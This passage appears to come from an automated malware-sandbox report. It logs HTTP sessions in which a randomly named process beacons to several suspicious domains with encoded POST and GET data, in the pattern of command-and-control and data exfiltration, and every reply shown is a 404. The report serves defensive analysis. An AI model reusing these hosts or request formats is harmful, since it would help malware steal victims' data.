                                                                      8192.168.2.450011172.67.182.198805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:39.396872997 CET466OUTGET /kxtt/?O2=aP0Tt&88v07=eC1oD4IhFSd/6jtM+gh2zJzzIbkctzW5zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhx4kXv42kRkXOBgymbjdyCqqE2F8kr6Zzpg= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.grimbo.boats
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 09:39:39.991668940 CET1099INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 08:39:39 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kndgJFUmg3EYbrKXbu9TRXOv5JTF29vDAbrG%2BCyIrjiDWWTpKrHnzhMq5McIvmGXQi%2BnBQpFy9K0UIR%2F49do06Rgz5c9S9CwAr1bwMI2xIoST7bRvYHCKcMnBtpVFyGmO5up"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 901413b96d6d41ba-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1925&min_rtt=1925&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=466&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.450012134.122.135.48805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:45.293178082 CET731OUTPOST /a59t/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.44756.pizza
                                                                      Origin: http://www.44756.pizza
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 202
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.44756.pizza/a59t/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 68 70 70 78 36 37 6c 37 6a 35 66 67 30 63 62 6f 45 6f 4e 4e 6a 62 77 67 67 56 4f 4f 49 69 78 41 49 32 34 5a 34 51 62 4b 68 77 67 45 56 6d 50 44 7a 4a 4d 63 38 65 37 2f 46 6e 58 4b 4d 30 70 35 4c 45 70 68 36 36 51 70 76 75 75 61 69 62 75 61 46 56 70 56 48 72 76 52 47 45 57 42 62 31 78 6e 64 52 58 64 6a 64 45 78 67 4e 70 6d 74 6f 39 4b 2b 63 41 73 42 47 50 47 47 5a 6f 31 47 71 50 4f 4b 4c 56 68 39 62 35 55 45 61 56 5a 4a 6b 4f 4e 73 33 56 70 54 35 79 78 4d 4e 51 57 4b 5a 5a 6d 69 46 57 30 65 43 64 33 49 58 53 6a 53 59 61 79 52 75 58 42 41 3d 3d
                                                                      Data Ascii: 88v07=1zjaTPzvwErQ9hppx67l7j5fg0cboEoNNjbwggVOOIixAI24Z4QbKhwgEVmPDzJMc8e7/FnXKM0p5LEph66QpvuuaibuaFVpVHrvRGEWBb1xndRXdjdExgNpmto9K+cAsBGPGGZo1GqPOKLVh9b5UEaVZJkONs3VpT5yxMNQWKZZmiFW0eCd3IXSjSYayRuXBA==
                                                                      Jan 13, 2025 09:39:46.174323082 CET312INHTTP/1.1 404 Not Found
                                                                      Content-Length: 148
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 08:39:46 GMT
                                                                      Etag: "6743f11f-94"
                                                                      Server: nginx
                                                                      Connection: close
                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.450013134.122.135.48805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:47.846576929 CET751OUTPOST /a59t/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.44756.pizza
                                                                      Origin: http://www.44756.pizza
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 222
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.44756.pizza/a59t/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 37 57 78 44 6f 47 34 59 35 51 62 5a 52 77 67 4d 31 6d 47 65 6a 4a 54 63 38 53 56 2f 45 62 58 4b 4d 67 70 35 4c 30 70 68 4a 43 54 70 2f 75 67 42 79 62 6f 51 6c 56 70 56 48 72 76 52 48 68 37 42 59 46 78 6e 4a 56 58 63 42 35 48 79 67 4d 62 75 4e 6f 39 63 4f 63 63 73 42 47 68 47 48 31 47 31 46 53 50 4f 4c 37 56 68 76 7a 36 64 45 61 58 55 70 6c 4a 46 4d 75 4a 68 6d 51 2f 7a 71 6c 66 58 37 56 64 6e 6b 49 4d 6c 76 6a 4b 6c 49 7a 68 2b 56 52 75 2f 53 54 65 61 4f 79 63 71 30 43 4e 44 31 68 50 66 47 57 6f 62 6d 65 62 6d 50 59 3d
                                                                      Data Ascii: 88v07=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO7WxDoG4Y5QbZRwgM1mGejJTc8SV/EbXKMgp5L0phJCTp/ugByboQlVpVHrvRHh7BYFxnJVXcB5HygMbuNo9cOccsBGhGH1G1FSPOL7Vhvz6dEaXUplJFMuJhmQ/zqlfX7VdnkIMlvjKlIzh+VRu/STeaOycq0CND1hPfGWobmebmPY=
                                                                      Jan 13, 2025 09:39:48.711422920 CET312INHTTP/1.1 404 Not Found
                                                                      Content-Length: 148
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 08:39:48 GMT
                                                                      Etag: "6743f11f-94"
                                                                      Server: nginx
                                                                      Connection: close
                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.450014134.122.135.48805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:50.399859905 CET10833OUTPOST /a59t/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.44756.pizza
                                                                      Origin: http://www.44756.pizza
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 10302
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.44756.pizza/a59t/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 36 75 78 41 61 4f 34 5a 65 38 62 61 52 77 67 43 56 6d 4c 65 6a 4a 61 63 2f 69 5a 2f 45 57 67 4b 50 59 70 34 6f 38 70 6e 34 43 54 69 2f 75 67 65 69 62 74 61 46 56 5a 56 48 37 6a 52 48 78 37 42 59 46 78 6e 50 35 58 4d 6a 64 48 30 67 4e 70 6d 74 6f 4c 4b 2b 63 67 73 42 65 58 47 48 42 34 31 55 79 50 4f 72 72 56 67 63 62 36 57 45 61 52 56 70 6c 72 46 4d 53 67 68 69 49 5a 7a 75 73 79 58 37 52 64 6c 51 42 55 78 39 76 67 34 35 54 74 38 46 67 4d 2b 44 48 54 58 38 33 38 6d 58 37 58 65 58 78 55 5a 57 44 2b 44 45 6a 52 39 35 35 74 34 55 38 41 6a 51 5a 2f 4e 73 62 56 73 4f 53 62 44 4a 73 6d 2b 45 56 56 30 50 73 35 76 2b 61 52 45 63 36 35 74 30 56 38 33 52 56 41 2f 67 58 37 70 33 4c 74 59 4e 53 6e 4d 74 63 41 72 45 50 5a 4b 4a 75 51 73 6c 65 56 57 38 33 64 5a 71 67 55 59 75 59 4d 35 71 41 76 75 68 6b 73 56 46 78 37 74 50 47 2f 58 46 68 6d 4b 52 72 72 41 75 46 55 5a 47 71 6a [TRUNCATED]
                                                                      Data Ascii: 88v07=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO6uxAaO4Ze8baRwgCVmLejJac/iZ/EWgKPYp4o8pn4CTi/ugeibtaFVZVH7jRHx7BYFxnP5XMjdH0gNpmtoLK+cgsBeXGHB41UyPOrrVgcb6WEaRVplrFMSghiIZzusyX7RdlQBUx9vg45Tt8FgM+DHTX838mX7XeXxUZWD+DEjR955t4U8AjQZ/NsbVsOSbDJsm+EVV0Ps5v+aREc65t0V83RVA/gX7p3LtYNSnMtcArEPZKJuQsleVW83dZqgUYuYM5qAvuhksVFx7tPG/XFhmKRrrAuFUZGqjfR0h3blGpnODQGudJQmFrHDBPy/yNj0p13GEHuUqDPMIn3TWn9wcaUykuzWXmWLPSJVQpx+E3+pLwIrsS1NLj7L+jTln2K4OthXg7LtLFLo9GOWWV2hj2VhJE5/6r9rLcsadpfXwMJorpS4vJaqJ72iST6r9iOd4XkB2lA7c0J2emZozVKsfe7cDLYQsMV4LlW07+ZxqDMg4sAFvKZgO7QPgracq4nQ8NXk35KX7D7JvlHJ6ImWPxkj8Ay9QR0lY6jfHEvK3IENh59b582Oh+C5OeeQb56L5Vg+etY+oOotcRo0p3MuAYjC7LXeE599d4uw1pAI1ajX34ED0E03Vpr4fMflsXD1m+6XbI37j6L6vcw9bIAjyGgzsVci0JD58v0Bdl7OYLhLK9VLrQdfnKY9NxNndZX+cMg3LU5lEsZS+C8yfab1Z4+q9Yc36Y8tcepnYfn+HMjfh08OGJAB5lv7DS+b7dyzZOvbz3JDc3qYa/4v82cJdNusHC2LnOhzLBUYKH+TxhW/C0LXVsCSWLosRRZEipWcLKV+HqtZLx/6TylN5VvRn8abTSD1U2nmz2HJxUL43tNHSRnLRZVzADfFB61QMdjm91FSaKB49j5/gkFQwHUMRBC2WTaKSPWLUJvlNyqEhvNfgpluN2XvTUpr5JIT6obhUgT [TRUNCATED]
                                                                      Jan 13, 2025 09:39:51.292751074 CET312INHTTP/1.1 404 Not Found
                                                                      Content-Length: 148
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 08:39:51 GMT
                                                                      Etag: "6743f11f-94"
                                                                      Server: nginx
                                                                      Connection: close
                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.450015134.122.135.48805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:52.946376085 CET465OUTGET /a59t/?88v07=4xL6Q7DrxWj99jxey6XhnD59kXlzpzVjNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acuv+yDBW+TCFZeEjgS2d8Hc9PwvsiMDAZ0mc=&O2=aP0Tt HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.44756.pizza
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 09:39:53.823113918 CET312INHTTP/1.1 404 Not Found
                                                                      Content-Length: 148
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 08:39:53 GMT
                                                                      Etag: "6743f11f-94"
                                                                      Server: nginx
                                                                      Connection: close
                                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.450016199.192.21.169805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:59.746731997 CET740OUTPOST /bowc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.lonfor.website
                                                                      Origin: http://www.lonfor.website
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 202
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.lonfor.website/bowc/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 32 52 33 7a 4d 6c 6e 6a 59 46 6c 72 4e 75 54 7a 59 4d 4b 68 71 66 4e 4a 46 46 6b 31 4c 56 54 47 68 48 6c 55 68 56 59 35 77 31 41 51 65 59 78 38 35 57 4f 49 78 4d 4e 43 4e 64 6f 36 35 61 59 6d 52 6f 47 6a 73 44 6d 38 4d 56 30 63 63 58 43 5a 4e 4d 65 77 2f 41 58 4d 4e 53 78 42 66 67 61 74 50 34 75 50 54 59 47 7a 38 49 6e 69 4c 41 70 48 31 4d 6f 68 73 58 61 49 68 42 61 4b 4a 46 59 2f 6c 59 4f 36 4c 65 62 44 78 77 34 7a 30 6d 45 48 69 73 41 4f 37 37 77 51 48 6a 62 58 78 5a 47 65 76 50 65 2b 41 57 30 6d 62 48 71 72 67 77 53 57 45 48 36 66 51 3d 3d
                                                                      Data Ascii: 88v07=sQtSC1b/Ma16y2R3zMlnjYFlrNuTzYMKhqfNJFFk1LVTGhHlUhVY5w1AQeYx85WOIxMNCNdo65aYmRoGjsDm8MV0ccXCZNMew/AXMNSxBfgatP4uPTYGz8IniLApH1MohsXaIhBaKJFY/lYO6LebDxw4z0mEHisAO77wQHjbXxZGevPe+AW0mbHqrgwSWEH6fQ==
                                                                      Jan 13, 2025 09:40:00.327872038 CET918INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 08:40:00 GMT
                                                                      Server: Apache
                                                                      Content-Length: 774
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.450017199.192.21.169805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:02.299962044 CET760OUTPOST /bowc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.lonfor.website
                                                                      Origin: http://www.lonfor.website
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 222
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.lonfor.website/bowc/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 78 54 48 41 33 6c 56 6c 68 59 30 51 31 41 46 75 59 77 2f 4a 57 2f 49 78 41 46 43 4d 68 6f 36 39 79 59 6d 51 59 47 69 62 2f 6c 39 63 56 79 4a 4d 58 41 58 74 4d 65 77 2f 41 58 4d 4a 44 35 42 66 34 61 74 2b 49 75 4f 78 38 4a 74 73 49 6b 6c 4c 41 70 57 6c 4d 73 68 73 58 34 49 6b 5a 67 4b 4d 42 59 2f 6e 41 4f 36 5a 32 61 4a 78 77 69 39 55 6e 6f 42 69 34 45 41 4b 61 50 58 42 72 48 49 79 4e 78 62 70 43 45 76 78 33 6a 30 62 6a 5a 32 6e 35 6d 62 48 36 7a 45 58 6c 4a 47 4d 59 2b 6b 48 33 76 4e 49 31 34 4f 6f 6e 6d 53 42 30 3d
                                                                      Data Ascii: 88v07=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10ppxTHA3lVlhY0Q1AFuYw/JW/IxAFCMho69yYmQYGib/l9cVyJMXAXtMew/AXMJD5Bf4at+IuOx8JtsIklLApWlMshsX4IkZgKMBY/nAO6Z2aJxwi9UnoBi4EAKaPXBrHIyNxbpCEvx3j0bjZ2n5mbH6zEXlJGMY+kH3vNI14OonmSB0=
                                                                      Jan 13, 2025 09:40:02.896920919 CET918INHTTP/1.1 404 Not Found
                                                                      Date: Mon, 13 Jan 2025 08:40:02 GMT
                                                                      Server: Apache
                                                                      Content-Length: 774
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.450018199.192.21.169805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:04.843262911 CET10842OUTPOST /bowc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
